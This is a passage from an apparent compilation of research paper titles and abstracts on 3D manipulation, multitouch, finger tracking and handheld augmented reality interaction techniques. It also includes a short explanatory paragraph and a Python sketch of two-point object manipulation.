Gloves and sensor-based trackers are unwieldy, constraining and uncomfortable to use. A natural, more intuitive method of interaction would be to allow the user to grasp objects with their hands and manipulate them as if they were real objects. We are investigating the use of computer vision in implementing a natural interface based on hand gestures. A framework for a gesture recognition system is introduced along with results of experiments in colour segmentation, feature extraction and template matching for finger and hand tracking and hand pose recognition. Progress in the implementation of a gesture interface for navigation and object manipulation in virtual environments is discussed. --- paper_title: Image plane interaction techniques in 3D immersive environments paper_content: This paper presents a set of interaction techniques for use in head-tracked immersive virtual environments. With these techniques, the user interacts with the 2D projections that 3D objects in the scene make on his image plane. The desktop analog is the use of a mouse to interact with objects in a 3D scene based on their projections on the monitor screen. Participants in an immersive environment can use the techniques we discuss for object selection, object manipulation, and user navigation in virtual environments. --- paper_title: Two-Finger Gestures for 6DOF Manipulation of 3D Objects paper_content: Multitouch input devices afford effective solutions for 6DOF (six Degrees of Freedom) manipulation of 3D objects. Mainly focusing on large-size multitouch screens, existing solutions typically require at least three fingers and bimanual interaction for full 6DOF manipulation. However, single-hand, two-finger operations are preferred especially for portable multitouch devices (e.g., popular smartphones) to cause less hand occlusion and relieve the other hand for necessary tasks like holding the devices. Our key idea for full 6DOF control using only two contact fingers is to introduce two manipulation modes and two corresponding gestures by examining the moving characteristics of the two fingers, instead of the number of fingers or the directness of individual fingers as done in previous works. We solve the resulting binary classification problem using a learning-based approach. Our pilot experiment shows that with only two contact fingers and typically unimanual interaction, our technique is comparable to or even better than the state-of-the-art techniques. --- paper_title: Integrality and Separability of Multitouch Interaction Techniques in 3D Manipulation Tasks paper_content: Multitouch displays represent a promising technology for the display and manipulation of data. While the manipulation of 2D data has been widely explored, 3D manipulation with multitouch displays remains largely unexplored. Based on an analysis of the integration and separation of degrees of freedom, we propose a taxonomy for 3D manipulation techniques with multitouch displays. Using that taxonomy, we introduce Depth-Separated Screen-Space (DS3), a new 3D manipulation technique based on the separation of translation and rotation. In a controlled experiment, we compared DS3 with Sticky Tools and Screen-Space.
Results show that separating the control of translation and rotation significantly affects performance for 3D manipulation, with DS3 performing faster than the two other techniques. --- paper_title: Dual-Finger 3D Interaction Techniques for mobile devices paper_content: Three-dimensional capabilities on mobile devices are increasing, and the interactivity is becoming a key feature of these tools. It is expected that users will actively engage with the 3D content, instead of being passive consumers. Because touch-screens provide a direct means of interaction with 3D content by directly touching and manipulating 3D graphical elements, touch-based interaction is a natural and appealing style of input for 3D applications. However, developing 3D interaction techniques for handheld devices using touch-screens is not a straightforward task. One issue is that when interacting with 3D objects, users occlude the object with their fingers. Furthermore, because the user's finger covers a large area of the screen, the smallest size of the object users can touch is limited. In this paper, we first inspect existing 3D interaction techniques based on their performance with handheld devices. Then, we present a set of precise Dual-Finger 3D Interaction Techniques for a small display. Finally, we present the results of an experimental study, where we evaluate the usability, performance, and error rate of the proposed and existing 3D interaction techniques. --- paper_title: Sticky tools: full 6DOF force-based interaction for multi-touch tables paper_content: Tabletop computing techniques are using physically familiar force-based interactions to enable compelling interfaces that provide a feeling of being embodied with a virtual object. We introduce an interaction paradigm that has the benefits of force-based interaction complete with full 6DOF manipulation. Only multi-touch input, such as that provided by the Microsoft Surface and the SMART Table, is necessary to achieve this interaction freedom. This paradigm is realized through sticky tools: a combination of sticky fingers, a physically familiar technique for moving, spinning, and lifting virtual objects; opposable thumbs, a method for flipping objects over; and virtual tools, a method for propagating behaviour to other virtual objects in the scene. We show how sticky tools can introduce richer meaning to tabletop computing by drawing a parallel between sticky tools and the discussion in Urp [20] around the meaning of tangible devices in terms of nouns, verbs, reconfigurable tools, attributes, and pure objects. We then relate this discussion to other force-based interaction techniques by describing how a designer can introduce complexity in how people can control both physical and virtual objects, how physical objects can control both physical and virtual objects, and how virtual objects can control virtual objects. --- paper_title: Using custom transformation axes for mid-air manipulation of 3D virtual objects paper_content: Virtual Reality environments are able to offer natural interaction metaphors. However, it is difficult to accurately place virtual objects in the desired position and orientation using gestures in mid-air. Previous research concluded that the separation of degrees-of-freedom (DOF) can lead to better results, but these benefits come with an increase in time when performing complex tasks, due to the additional number of transformations required. 
In this work, we assess whether custom transformation axes can be used to achieve the accuracy of DOF separation without sacrificing completion time. For this, we developed a new manipulation technique, MAiOR, which offers translation and rotation separation, supporting both 3-DOF and 1-DOF manipulations, using personalized axes for the latter. Additionally, it also has direct 6-DOF manipulation for coarse transformations, and scaled object translation for increased placement. We compared MAiOR against an exclusively 6-DOF approach and a widget-based approach with explicit DOF separation. Results show that, contrary to previous research suggestions, single DOF manipulations are not appealing to users. Instead, users favored 3-DOF manipulations above all, while keeping translation and rotation independent. --- paper_title: A Survey of Augmented Reality paper_content: This paper surveys the field of augmented reality AR, in which 3D virtual objects are integrated into a 3D real environment in real time. It describes the medical, manufacturing, visualization, path planning, entertainment, and military applications that have been explored. This paper describes the characteristics of augmented reality systems, including a detailed discussion of the tradeoffs between optical and video blending approaches. Registration and sensing errors are two of the biggest problems in building effective augmented reality systems, so this paper summarizes current efforts to overcome these problems. Future directions and areas requiring further research are discussed. This survey provides a starting point for anyone interested in researching or using augmented reality. --- paper_title: One-handed interaction with augmented virtual objects on mobile devices paper_content: We present a one-handed approach for augmented reality and interaction on mobile devices. The proposed application considers common situations with mobile devices such as when a user's hand holds a mobile device while the other hand is free. It also supports natural augmented reality environment such as when a user interacts with augmented reality contents anytime and anywhere without special equipment such as visual markers or tags. In our approach, a virtual object is augmented on the palm of a user's free hand, as if the virtual object is just sitting on the palm, using a palm pose estimation method. The augmented virtual object reacts (e.g. moving or animation) to motions of the hand such as opening or closing the hand based on fingertip tracking. Moreover, it provides tactile interactions with the virtual object by wearing a tactile glove with vibration sensors. This paper describes how to implement the augmented reality application, and preliminary results show its potential as a new approach to mobile augmented reality interaction. --- paper_title: Combining multi-touch input and device movement for 3D manipulations in mobile augmented reality environments paper_content: Nowadays, handheld devices are capable of displaying augmented environments in which virtual content overlaps reality. To interact with these environments it is necessary to use a manipulation technique. The objective of a manipulation technique is to define how the input data modify the properties of the virtual objects. Current devices have multi-touch screens that can serve as input. Additionally, the position and rotation of the device can also be used as input creating both an opportunity and a design challenge. 
In this paper we compared three manipulation techniques which namely employ multi-touch, device position and a combination of both. A user evaluation on a docking task revealed that combining multi-touch and device movement yields the best task completion time and efficiency. Nevertheless, using only the device movement and orientation is more intuitive and performs worse only in large rotations. --- paper_title: Shift: a technique for operating pen-based interfaces using touch paper_content: Retrieving the stylus of a pen-based device takes time and requires a second hand. Especially for short intermittent interactions many users therefore choose to use their bare fingers. Although convenient, this increases targeting times and error rates. We argue that the main reasons are the occlusion of the target by the user's finger and ambiguity about which part of the finger defines the selection point. We propose a pointing technique we call Shift that is designed to address these issues. When the user touches the screen, Shift creates a callout showing a copy of the occluded screen area and places it in a non-occluded location. The callout also shows a pointer representing the selection point of the finger. Using this visual feedback, users guide the pointer into the target by moving their finger on the screen surface and commit the target acquisition by lifting the finger. Unlike existing techniques, Shift is only invoked when necessary--over large targets no callout is created and users enjoy the full performance of an unaltered touch screen. We report the results of a user study showing that with Shift participants can select small targets with much lower error rates than an unaided touch screen and that Shift is faster than Offset Cursor for larger targets. --- paper_title: Mobile augmented reality interaction techniques for authoring situated media on-site paper_content: We present a set of mobile augmented reality interaction techniques for authoring situated media: multimedia and hypermedia that are embedded within the physical environment. Our techniques are designed for use with a tracked hand-held tablet display with an attached camera, and rely on "freezing" the frame for later editing. --- paper_title: Napkin sketch: handheld mixed reality 3D sketching paper_content: This paper describes, Napkin Sketch, a 3D sketching interface which attempts to support sketch-based artistic expression in 3D, mimicking some of the qualities of conventional sketching media and tools both in terms of physical properties and interaction experience. A portable tablet PC is used as the sketching platform, and handheld mixed reality techniques are employed to allow 3D sketches to be created on top of a physical napkin. Intuitive manipulation and navigation within the 3D design space is achieved by visually tracking the tablet PC with a camera and mixed reality markers. For artistic expression using sketch input, we improve upon the projective 3D sketching approach with a one stroke sketch plane definition technique. This coupled with the hardware setup produces a natural and fluid sketching experience. --- paper_title: Experiments in 3D interaction for mobile phone AR paper_content: In this paper we present an evaluation of several different techniques for virtual object positioning and rotation on a mobile phone. We compare gesture input captured by the phone's front camera, to tangible input, keypad interaction and phone tilting in increasingly complex positioning and rotation tasks in an AR context. 
Usability experiments found that tangible input techniques are best for translation tasks, while keypad input is best for rotation tasks. Implications for the design of mobile phone 3D interfaces are presented as well as directions for future research. --- paper_title: Back-of-device interaction allows creating very small touch devices paper_content: In this paper, we explore how to add pointing input capabilities to very small screen devices. On first sight, touchscreens seem to allow for particular compactness, because they integrate input and screen into the same physical space. The opposite is true, however, because the user's fingers occlude contents and prevent precision. We argue that the key to touch-enabling very small devices is to use touch on the device backside. In order to study this, we have created a 2.4" prototype device; we simulate screens smaller than that by masking the screen. We present a user study in which participants completed a pointing task successfully across display sizes when using a back-of device interface. The touchscreen-based control condition (enhanced with the shift technique), in contrast, failed for screen diagonals below 1 inch. We present four form factor concepts based on back-of-device interaction and provide design guidelines extracted from a second user study. --- paper_title: FingARtips: gesture based direct manipulation in Augmented Reality paper_content: This paper presents a technique for natural, fingertip-based interaction with virtual objects in Augmented Reality (AR) environments. We use image processing software and finger- and hand-based fiducial markers to track gestures from the user, stencil buffering to enable the user to see their fingers at all times, and fingertip-based haptic feedback devices to enable the user to feel virtual objects. Unlike previous AR interfaces, this approach allows users to interact with virtual content using natural hand gestures. The paper describes how these techniques were applied in an urban planning interface, and also presents preliminary informal usability results. --- paper_title: Smartphone as an augmented reality authoring tool via multi-touch based 3D interaction method paper_content: In this paper we present an Augmented Reality (AR) authoring tool for smartphones which facilitates intuitive interactions that manipulate the augmented virtual objects in real-time. A novel 3D interaction method using multi-touch interface and camera pose is proposed for intuitive authoring. With the gestures of two fingers on the touch screen, the user can adjust 3 DOF translation and 3 DOF rotation to a selected virtual object. The capabilities of the authoring tool are demonstrated on a smartphone. --- paper_title: Freeze-Set-Go interaction method for handheld mobile augmented reality environments paper_content: Mobile computing devices are getting popular as a platform for augmented reality (AR) application, and efficient interaction methods for mobile AR environments are considered necessary. Recently, touch interfaces are getting popular and drawing attention as a future standard interface on mobile computing devices. However, accurate touch interactions are not that easy in mobile AR environments where users tend to move and viewpoints easily get shaky. In this paper, the authors suggest a new interaction method for handheld mobile AR environments, named 'Freeze-Set-Go'. 
The proposed interaction method lets users 'freeze' the real world view tentatively, and continue to manipulate virtual entities within the AR scene. According to the user experiment, the proposed method turned out to help users interact with mobile AR environments using touch interfaces in a more accurate and comfortable way. --- paper_title: Finger tracking for interaction in augmented environments paper_content: Optical tracking systems allow three-dimensional input for virtual environment applications with high precision and without annoying cables. Spontaneous and intuitive interaction is possible through gestures. The authors present a finger tracker that allows gestural interaction and is simple, cheap, fast, robust against occlusion and accurate. It is based on a marked glove, a stereoscopic tracking system and a kinematic 3D model of the human finger. Within our augmented reality application scenario, the user is able to grab, translate, rotate, and release objects in an intuitive way. We demonstrate our tracking system in an augmented reality chess game, allowing a user to interact with virtual objects. --- paper_title: High Precision Touchscreens: Design Strategies and Comparisons with a Mouse paper_content: Three studies were conducted comparing speed of performance, error rates and user preference ratings for three selection devices. The devices tested were a touchscreen, a touchscreen with stabilization (stabilization software filters and smooths raw data from hardware), and a mouse. The task was the selection of rectangular targets 1, 4, 16 and 32 pixels per side (0.4 × 0.6, 1.7 × 2.2, 6.9 × 9.0, 13.8 × 17.9 mm respectively). Touchscreen users were able to point at single pixel targets, thereby countering widespread expectations of poor touchscreen resolution. The results show no difference in performance between the mouse and touchscreen for targets ranging from 32 to 4 pixels per side. In addition, stabilization significantly reduced the error rates for the touchscreen when selecting small targets. These results imply that touchscreens, when properly used, have attractive advantages in selecting targets as small as 4 pixels per side (approximately one-quarter of the size of a single character). A variant of Fitts' Law is proposed to predict touchscreen pointing times. Ideas for future research are also presented. --- paper_title: Freeze view touch and finger gesture based interaction methods for handheld augmented reality interfaces paper_content: Interaction techniques for handheld mobile Augmented Reality (AR) often focus on device-centric methods based around touch input. However, users may not be able to easily interact with virtual objects in mobile AR scenes if they are holding the handheld device with one hand and touching the screen with the other, while at the same time trying to maintain visual tracking of an AR marker. In this paper we explore novel interaction methods for handheld mobile AR that overcome this problem. We investigate two different approaches: (1) freeze view touch and (2) finger gesture based interaction. We describe how each method is implemented and present findings from a user experiment comparing virtual object manipulation with these techniques to more traditional touch methods. --- paper_title: Poster: Real-time markerless kinect based finger tracking and hand gesture recognition for HCI paper_content: Hand gestures are intuitive ways to interact with a variety of user interfaces.
We developed a real-time finger tracking technique using the Microsoft Kinect as an input device and compared its results with an existing technique that uses the K-curvature algorithm. Our technique calculates feature vectors based on Fourier descriptors of equidistant points chosen on the silhouette of the detected hand and uses template matching to find the best match. Our preliminary results show that our technique performed as well as an existing k-curvature algorithm based finger detection technique. --- paper_title: Interactions in the air: adding further depth to interactive tabletops paper_content: Although interactive surfaces have many unique and compelling qualities, the interactions they support are by their very nature bound to the display surface. In this paper we present a technique for users to seamlessly switch between interacting on the tabletop surface and above it. Our aim is to leverage the space above the surface in combination with the regular tabletop display to allow more intuitive manipulation of digital content in three dimensions. Our goal is to design a technique that closely resembles the ways we manipulate physical objects in the real world; conceptually, allowing virtual objects to be 'picked up' off the tabletop surface in order to manipulate their three dimensional position or orientation. We chart the evolution of this technique, implemented on two rear projection-vision tabletops. Both use special projection screen materials to allow sensing at significant depths beyond the display. Existing and new computer vision techniques are used to sense hand gestures and postures above the tabletop, which can be used alongside more familiar multi-touch interactions. Interacting above the surface in this way opens up many interesting challenges. In particular, it breaks the direct interaction metaphor that most tabletops afford. We present a novel shadow-based technique to help alleviate this issue. We discuss the strengths and limitations of our technique based on our own observations and initial user feedback, and provide various insights from comparing and contrasting our tabletop implementations. --- paper_title: DigitEyes: vision-based hand tracking for human-computer interaction paper_content: Computer sensing of hand and limb motion is an important problem for applications in human-computer interaction (HCI), virtual reality, and athletic performance measurement. Commercially available sensors are invasive, and require the user to wear gloves or targets. We have developed a noninvasive vision-based hand tracking system, called DigitEyes. Employing a kinematic hand model, the DigitEyes system has demonstrated tracking performance at speeds of up to 10 Hz, using line and point features extracted from gray scale images of unadorned, unmarked hands. We describe an application of our sensor to a 3D mouse user-interface problem. --- paper_title: A handle bar metaphor for virtual object manipulation with mid-air interaction paper_content: Commercial 3D scene acquisition systems such as the Microsoft Kinect sensor can reduce the cost barrier of realizing mid-air interaction. However, since it can only sense hand position but not hand orientation robustly, current mid-air interaction methods for 3D virtual object manipulation often require contextual and mode switching to perform translation, rotation, and scaling, thus preventing natural continuous gestural interactions.
A novel handle bar metaphor is proposed as an effective visual control metaphor between the user's hand gestures and the corresponding virtual object manipulation operations. It mimics a familiar situation of handling objects that are skewered with a bimanual handle bar. The use of relative 3D motion of the two hands to design the mid-air interaction allows us to provide precise controllability despite the Kinect sensor's low image resolution. A comprehensive repertoire of 3D manipulation operations is proposed to manipulate single objects, perform fast constrained rotation, and pack/align multiple objects along a line. Three user studies were devised to demonstrate the efficacy and intuitiveness of the proposed interaction techniques on different virtual manipulation scenarios. --- paper_title: Real-time hand-tracking with a color glove paper_content: Articulated hand-tracking systems have been widely used in virtual reality but are rarely deployed in consumer applications due to their price and complexity. In this paper, we propose an easy-to-use and inexpensive system that facilitates 3-D articulated user-input using the hands. Our approach uses a single camera to track a hand wearing an ordinary cloth glove that is imprinted with a custom pattern. The pattern is designed to simplify the pose estimation problem, allowing us to employ a nearest-neighbor approach to track hands at interactive rates. We describe several proof-of-concept applications enabled by our system that we hope will provide a foundation for new interactions in modeling, animation control and augmented reality. --- paper_title: Balloon Selection: A Multi-Finger Technique for Accurate Low-Fatigue 3D Selection paper_content: Balloon selection is a 3D interaction technique that is modeled after the real world metaphor of manipulating a helium balloon attached to a string. Balloon selection allows for precise 3D selection in the volume above a tabletop surface by using multiple fingers on a multi-touch-sensitive surface. The 3DOF selection task is decomposed in part into a 2DOF positioning task performed by one finger on the tabletop in an absolute 2D Cartesian coordinate system and a 1DOF positioning task performed by another finger on the tabletop in a relative 2D polar coordinate system. We have evaluated balloon selection in a formal user study that compared it to two well-known interaction techniques for selecting a static 3D target: a 3DOF tracked wand and keyboard cursor keys. We found that balloon selection was significantly faster than using cursor keys and had a significantly lower error rate than the wand. The lower error rate appeared to result from the user's hands being supported by the tabletop surface, resulting in significantly reduced hand tremor and arm fatigue. --- paper_title: The Continuous Interaction Space: Interaction Techniques Unifying Touch and Gesture On and Above a Digital Surface paper_content: The rising popularity of digital table surfaces has spawned considerable interest in new interaction techniques. Most interactions fall into one of two modalities: 1) direct touch and multi-touch (by hand and by tangibles) directly on the surface, and 2) hand gestures above the surface. The limitation is that these two modalities ignore the rich interaction space between them. To move beyond this limitation, we first contribute a unification of these discrete interaction modalities called the continuous interaction space.
The idea is that many interaction techniques can be developed that go beyond these two modalities, where they can leverage the space between them. That is, we believe that the underlying system should treat the space on and above the surface as a continuum, where a person can use touch, gestures, and tangibles anywhere in the space and naturally move between them. Our second contribution illustrates this, where we introduce a variety of interaction categories that exploit the space between these modalities. For example, with our Extended Continuous Gestures category, a person can start an interaction with a direct touch and drag, then naturally lift off the surface and continue their drag with a hand gesture over the surface. For each interaction category, we implement an example (or use prior work) that illustrates how that technique can be applied. In summary, our primary contribution is to broaden the design space of interaction techniques for digital surfaces, where we populate the continuous interaction space both with concepts and examples that emerge from considering this space as a continuum. --- paper_title: Robust finger tracking with multiple cameras paper_content: This paper gives an overview of a system for robustly tracking the 3D position and orientation of a finger using a few closely spaced cameras. Accurate results are obtained by combining features of stereo range images and color images. This work also provides a design framework for combining multiple sources of information, including stereo range images, color segmentations, shape information and various constraints. This information is used in robust model fitting techniques to track highly over-constrained models of deformable objects: fingers. --- paper_title: Triangle cursor: interactions with objects above the tabletop paper_content: Extending the tabletop display to the third dimension using a stereoscopic projection offers the possibility to improve applications by using the volume above the table surface. The combination of multi-touch input and stereoscopic projection usually requires an indirect technique to interact with objects above the tabletop, as touches can only be detected on the surface. Triangle Cursor is a 3D interaction technique that allows specification of a 3D position and yaw rotation above the interactive tabletop. It was designed to avoid occlusions that disturb the stereoscopic perception. While Triangle Cursor uses an indirect approach, the position, the height above the surface and the yaw rotation can be controlled simultaneously, resulting in a 4 DOF manipulation technique. We have evaluated Triangle Cursor in an initial user study and compared it to a related existing technique in a formal user study. Our experiments show that users were able to perform all tasks significantly faster with our technique without losing any precision. Most of the subjects considered the technique easy to use and satisfying. --- paper_title: Using Kinect for hand tracking and rendering in wearable haptics paper_content: Wearable haptic devices with poor position sensing are combined with the Kinect depth sensor by Microsoft. A heuristic hand tracker has been developed. It allows for the animation of the hand avatar in the virtual reality and the implementation of the force rendering algorithm: the position of the fingertips is measured by the hand tracker designed and optimized for Kinect, and the rendering algorithm computes the contact forces for wearable haptic display.
Preliminary experiments with qualitative results show the effectiveness of the idea of combining Kinect and wearable haptics. --- paper_title: Integrality and Separability of Multitouch Interaction Techniques in 3D Manipulation Tasks paper_content: Multitouch displays represent a promising technology for the display and manipulation of data. While the manipulation of 2D data has been widely explored, 3D manipulation with multitouch displays remains largely unexplored. Based on an analysis of the integration and separation of degrees of freedom, we propose a taxonomy for 3D manipulation techniques with multitouch displays. Using that taxonomy, we introduce Depth-Separated Screen-Space (DS3), a new 3D manipulation technique based on the separation of translation and rotation. In a controlled experiment, we compared DS3 with Sticky Tools and Screen-Space. Results show that separating the control of translation and rotation significantly affects performance for 3D manipulation, with DS3 performing faster than the two other techniques. --- paper_title: Mid-air interactions above stereoscopic interactive tables paper_content: Stereoscopic tabletops offer unique visualization capabilities, enabling users to perceive virtual objects as if they were lying above the surface. While allowing virtual objects to coexist with user actions in the physical world, interaction with these virtual objects above the surface presents interesting challenges. In this paper, we aim to understand which approaches to 3D virtual object manipulations are suited to this scenario. To this end, we implemented five different techniques based on the literature. Four are mid-air techniques, while the remainder relies on multi-touch gestures, which act as a baseline. Our setup combines affordable non-intrusive tracking technologies with a multi-touch stereo tabletop, providing head and hands tracking, to improve both depth perception and seamless interactions above the table. We conducted a user evaluation to find out which technique appealed most to participants. Results suggest that mid-air interactions, combining direct manipulation with six degrees of freedom for the dominant hand, are both more satisfying and efficient than the alternatives tested. --- paper_title: Visual tracking of bare fingers for interactive surfaces paper_content: Visual tracking of bare fingers allows more direct manipulation of digital objects, multiple simultaneous users interacting with their two hands, and permits the interaction on large surfaces, using only commodity hardware. After presenting related work, we detail our implementation. Its design is based on our modeling of two classes of algorithms that are key to the tracker: Image Differencing Segmentation (IDS) and Fast Rejection Filters (FRF). We introduce a new chromatic distance for IDS and a FRF that is independent to finger rotation. The system runs at full frame rate (25 Hz) with an average total system latency of 80 ms, independently of the number of tracked fingers. When used in a controlled environment such as a meeting room, its robustness is satisfying for everyday use. --- paper_title: Using custom transformation axes for mid-air manipulation of 3D virtual objects paper_content: Virtual Reality environments are able to offer natural interaction metaphors. However, it is difficult to accurately place virtual objects in the desired position and orientation using gestures in mid-air. 
Previous research concluded that the separation of degrees-of-freedom (DOF) can lead to better results, but these benefits come with an increase in time when performing complex tasks, due to the additional number of transformations required. In this work, we assess whether custom transformation axes can be used to achieve the accuracy of DOF separation without sacrificing completion time. For this, we developed a new manipulation technique, MAiOR, which offers translation and rotation separation, supporting both 3-DOF and 1-DOF manipulations, using personalized axes for the latter. Additionally, it also has direct 6-DOF manipulation for coarse transformations, and scaled object translation for increased placement. We compared MAiOR against an exclusively 6-DOF approach and a widget-based approach with explicit DOF separation. Results show that, contrary to previous research suggestions, single DOF manipulations are not appealing to users. Instead, users favored 3-DOF manipulations above all, while keeping translation and rotation independent. --- paper_title: Mockup Builder: Direct 3D Modeling On and Above the Surface in a Continuous Interaction Space paper_content: Our work introduces a semi-immersive environment for conceptual design where virtual mockups are obtained from gestures we aim to get closer to the way people conceive, create and manipulate three-dimensional shapes. We present on-and-above-the-surface interaction techniques following Guiard's asymmetric bimanual model to take advantage of the continuous interaction space for creating and editing 3D models in a stereoscopic environment. To allow for more expressive interactions, our approach continuously combines hand and finger tracking in the space above the table with multi-touch on its surface. This combination brings forth an alternative design environment where users can seamlessly switch between interacting on the surface or in the space above it depending on the task. Our approach integrates continuous space usage with bimanual interaction to provide an expressive set of 3D modeling operations. Preliminary trials with our experimental setup show this as a very promising avenue for further work. --- paper_title: Gesture-based interaction via finger tracking for mobile augmented reality paper_content: The goal of this research is to explore new interaction metaphors for augmented reality on mobile phones, i.e. applications where users look at the live image of the device’s video camera and 3D virtual objects enrich the scene that they see. Common interaction concepts for such applications are often limited to pure 2D pointing and clicking on the device’s touch screen. Such an interaction with virtual objects is not only restrictive but also difficult, for example, due to the small form factor. In this article, we investigate the potential of finger tracking for gesture-based interaction. We present two experiments evaluating canonical operations such as translation, rotation, and scaling of virtual objects with respect to performance (time and accuracy) and engagement (subjective user feedback). Our results indicate a high entertainment value, but low accuracy if objects are manipulated in midair, suggesting great possibilities for leisure applications but limited usage for serious tasks. 
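Several mid-air techniques in the surrounding entries (the handle bar metaphor, the bimanual manipulations above stereoscopic tables, and the fingertip pinch gestures for mobile AR) share one underlying mapping: two tracked 3D points drive the object, with the midpoint controlling translation, the reorientation of the inter-point vector controlling rotation, and the change in inter-point distance controlling uniform scale. The following Python sketch is a minimal reconstruction of that two-point mapping, assuming some external tracker supplies the two 3D points each frame; it is not the exact formulation of any single cited paper, and the function names are ours.

```python
import numpy as np


def rotation_between(a: np.ndarray, b: np.ndarray) -> np.ndarray:
    """Smallest rotation matrix taking the direction of a to the direction of b."""
    a = a / np.linalg.norm(a)
    b = b / np.linalg.norm(b)
    v = np.cross(a, b)
    c = float(np.dot(a, b))
    s2 = float(np.dot(v, v))
    if s2 < 1e-12:                      # vectors are (anti)parallel
        if c > 0.0:
            return np.eye(3)
        # 180 degree rotation about any axis perpendicular to a.
        axis = np.cross(a, np.array([1.0, 0.0, 0.0]))
        if np.linalg.norm(axis) < 1e-6:
            axis = np.cross(a, np.array([0.0, 1.0, 0.0]))
        axis /= np.linalg.norm(axis)
        return 2.0 * np.outer(axis, axis) - np.eye(3)
    vx = np.array([[0.0, -v[2], v[1]],
                   [v[2], 0.0, -v[0]],
                   [-v[1], v[0], 0.0]])
    return np.eye(3) + vx + vx @ vx * ((1.0 - c) / s2)   # Rodrigues' formula


def two_point_update(obj_pos, obj_rot, obj_scale,
                     prev_a, prev_b, cur_a, cur_b):
    """Update an object's pose from two tracked 3D points (two hands or two fingertips).

    obj_pos: (3,) position, obj_rot: (3, 3) rotation, obj_scale: float.
    prev_*/cur_*: (3,) tracked point positions in the previous and current frame.
    """
    prev_mid, cur_mid = 0.5 * (prev_a + prev_b), 0.5 * (cur_a + cur_b)
    prev_vec, cur_vec = prev_b - prev_a, cur_b - cur_a

    dR = rotation_between(prev_vec, cur_vec)                    # "bar" reorientation
    ds = np.linalg.norm(cur_vec) / np.linalg.norm(prev_vec)     # "bar" stretch

    new_rot = dR @ obj_rot
    new_scale = obj_scale * ds
    # Rotate and scale about the bar midpoint, then follow the midpoint's motion.
    new_pos = cur_mid + ds * (dR @ (obj_pos - prev_mid))
    return new_pos, new_rot, new_scale


if __name__ == "__main__":
    pos, rot, scale = np.array([0.0, 0.0, 0.5]), np.eye(3), 1.0
    prev_a, prev_b = np.array([-0.1, 0.0, 0.5]), np.array([0.1, 0.0, 0.5])
    cur_a, cur_b = np.array([-0.2, 0.0, 0.5]), np.array([0.2, 0.0, 0.5])  # hands spread
    pos, rot, scale = two_point_update(pos, rot, scale, prev_a, prev_b, cur_a, cur_b)
    print(pos, scale)   # object anchored at the midpoint stays put and doubles in size
```

Note that a two-point constraint alone cannot observe twist about the bar axis itself, so a full implementation would still need an extra gesture or mode for that remaining degree of freedom.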
--- paper_title: Real-time hand interaction for augmented reality on mobile phones paper_content: Over the past few years, Augmented Reality has become widely popular in the form of smart phone applications, however most smart phone-based AR applications are limited in user interaction and do not support gesture-based direct manipulation of the augmented scene. In this paper, we introduce a new AR interaction methodology, employing users' hands and fingers to interact with the virtual (and possibly physical) objects that appear on the mobile phone screen. The goal of this project was to support different types of interaction (selection, transformation, and fine-grain control of an input value) while keeping the methodology for hand detection as simple as possible to maintain good performance on smart phones. We evaluated our methods in user studies, collecting task performance data and user impressions about this direct way of interacting with augmented scenes through mobile phones. --- paper_title: Free-hand interaction for handheld augmented reality using an RGB-depth camera paper_content: In this paper, we present a novel gesture-based interaction method for handheld Augmented Reality (AR) implemented on a tablet with an RGB-Depth camera attached. Compared with conventional device-centric interaction methods like keypad, stylus, or touchscreen input, natural gesture-based interfaces offer a more intuitive experience for AR applications. Combining with depth information, gesture interfaces can extend handheld AR interaction into full 3D space. In our system we retrieve the 3D hand skeleton from color and depth frames, mapping the results to corresponding manipulations of virtual objects in the AR scene. Our method allows users to control virtual objects in 3D space using their bare hands and perform operations such as translation, rotation, and zooming. --- paper_title: Poster: Markerless fingertip-based 3D interaction for handheld augmented reality in a small workspace paper_content: Compared with traditional screen-touch input, natural gesture-based interaction approaches could offer a more intuitive user experience in handheld Augmented Reality (AR) applications. However, most gesture interaction techniques for handheld AR only use two degrees of freedom without the third depth dimension, while AR virtual objects are overlaid on a view of a three dimensional space. In this paper, we investigate a markerless fingertip-based 3D interaction method within a client-server framework in a small workspace. Our solution includes seven major components: (1) fingertip detection (2) fingertip depth acquisition (3) marker tracking (4) coordinate transformation (5) data communication (6) gesture interaction (7) graphic rendering. We describe the process of each step in details and present performance results of our prototype. --- paper_title: A REVIEW OF 3D GESTURE INTERACTION FOR HANDHELD AUGMENTED REALITY paper_content: Interaction for Handheld Augmented Reality (HAR) is a challenging research topic because of the small screen display and limited input options. Although 2D touch screen input is widely used, 3D gesture interaction is a suggested alternative input method. Recent 3D gesture interaction research mainly focuses on using RGB-Depth cameras to detect the spatial position and pose of fingers, using this data for virtual object manipulations in the AR scene. In this paper we review previous 3D gesture research on handheld interaction metaphors for HAR. 
We present their novelties as well as limitations, and discuss future research directions of 3D gesture interaction for HAR. Our results indicate that 3D gesture input on HAR is a potential interaction method for assisting a user in many tasks such as in education, urban simulation and 3D games. --- paper_title: 3D gesture interaction for handheld augmented reality paper_content: In this paper, we present a prototype for exploring natural gesture interaction with Handheld Augmented Reality (HAR) applications, using visual tracking based AR and freehand gesture based interaction detected by a depth camera. We evaluated this prototype in a user study comparing 3D gesture input methods with traditional touch-based techniques, using canonical manipulation tasks that are common in AR scenarios. We collected task performance data and user feedback via a usability questionnaire. The 3D gesture input methods were found to be slower, but the majority of the participants preferred them and gave them higher usability ratings. Being intuitive and natural was the most common feedback about the 3D freehand interface. We discuss implications of this research and directions for further work. --- paper_title: Balloon Selection: A Multi-Finger Technique for Accurate Low-Fatigue 3D Selection paper_content: Balloon selection is a 3D interaction technique that is modeled after the real world metaphor of manipulating a helium balloon attached to a string. Balloon selection allows for precise 3D selection in the volume above a tabletop surface by using multiple fingers on a multi-touch-sensitive surface. The 3DOF selection tasks is decomposed in part into a 2DOF positioning task performed by one finger on the tabletop in an absolute 2D Cartesian coordinate system and a 1DOF positioning task performed by another finger on the tabletop in a relative 2D polar coordinate system. We have evaluated balloon selection in a formal user study that compared it to two well-known interaction techniques for selecting a static 3D target: a 3DOF tracked wand and keyboard cursor keys. We found that balloon selection was significantly faster than using cursor keys and had a significantly lower error rate than the wand. The lower error rate appeared to result from the user's hands being supported by the tabletop surface, resulting in significantly reduced hand tremor and arm fatigue. --- paper_title: Real-time hand interaction for augmented reality on mobile phones paper_content: Over the past few years, Augmented Reality has become widely popular in the form of smart phone applications, however most smart phone-based AR applications are limited in user interaction and do not support gesture-based direct manipulation of the augmented scene. In this paper, we introduce a new AR interaction methodology, employing users' hands and fingers to interact with the virtual (and possibly physical) objects that appear on the mobile phone screen. The goal of this project was to support different types of interaction (selection, transformation, and fine-grain control of an input value) while keeping the methodology for hand detection as simple as possible to maintain good performance on smart phones. We 